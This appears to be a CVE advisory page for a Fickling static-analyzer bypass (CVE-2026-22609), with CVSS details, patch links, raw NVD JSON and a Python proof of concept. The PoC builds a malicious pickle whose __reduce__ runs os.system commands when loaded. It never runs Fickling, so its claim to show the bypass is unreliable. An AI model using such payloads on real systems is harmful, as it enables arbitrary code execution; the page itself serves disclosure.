Security Vulnerability Report
CVE-2026-22609 CVSS 7.8 HIGH

CVE-2026-22609

Published: 2026-01-10 02:15:50
Last Modified: 2026-01-16 18:52:26

Description

Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weaknesses: CWE-184, CWE-502

Configurations (Affected Products)

cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:python:*:* - VULNERABLE
Fickling < 0.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

# CVE-2026-22609 PoC - Malicious pickle exploiting unflagged modules
# This pickle uses modules not flagged by Fickling's unsafe_imports()
import pickle
import os


# Payload that uses the os module (which may not be flagged)
class MaliciousPayload:
    def __reduce__(self):
        # Using os.system to execute arbitrary commands
        cmd = "whoami > /tmp/pwned.txt"
        return (os.system, (cmd,))


# Create the malicious pickle
malicious_data = pickle.dumps(MaliciousPayload())

# Bypass Fickling analysis
print(f"Malicious pickle size: {len(malicious_data)} bytes")
print("Fickling may not flag this as unsafe due to incomplete module list")

# Alternative payload using subprocess (if not flagged)
# import subprocess
# class RCEPayload:
#     def __reduce__(self):
#         return (subprocess.check_output, (['id'],))

# Save for later use
with open('malicious.pkl', 'wb') as f:
    f.write(malicious_data)

# To execute:
# pickle.load(open('malicious.pkl', 'rb'))

References

https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91 (Patch)
https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66 (Patch)
https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1 (Patch)
https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9 (Patch)
https://github.com/trailofbits/fickling/releases/tag/v0.1.7 (Release Notes)
https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22609", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:50.050", "lastModified": "2026-01-16T18:52:26.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7."}, {"lang": "es", "value": "Fickling es un descompilador de pickling de Python y analizador estático. Antes de la versión 0.1.7, el método unsafe_imports() en el analizador estático de Fickling no logra marcar varios módulos de Python de alto riesgo que pueden ser utilizados para la ejecución de código arbitrario. Pickles maliciosos que importan estos módulos no serán detectados como inseguros, permitiendo a los atacantes eludir las comprobaciones de seguridad estáticas primarias de Fickling. 
Este problema ha sido parcheado en la versión 0.1.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.1.7", "matchCriteriaId": "0D11EA35-A440-4468-BC69-709AA3A18DD9"}]}]}], "references": [{"url": "https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}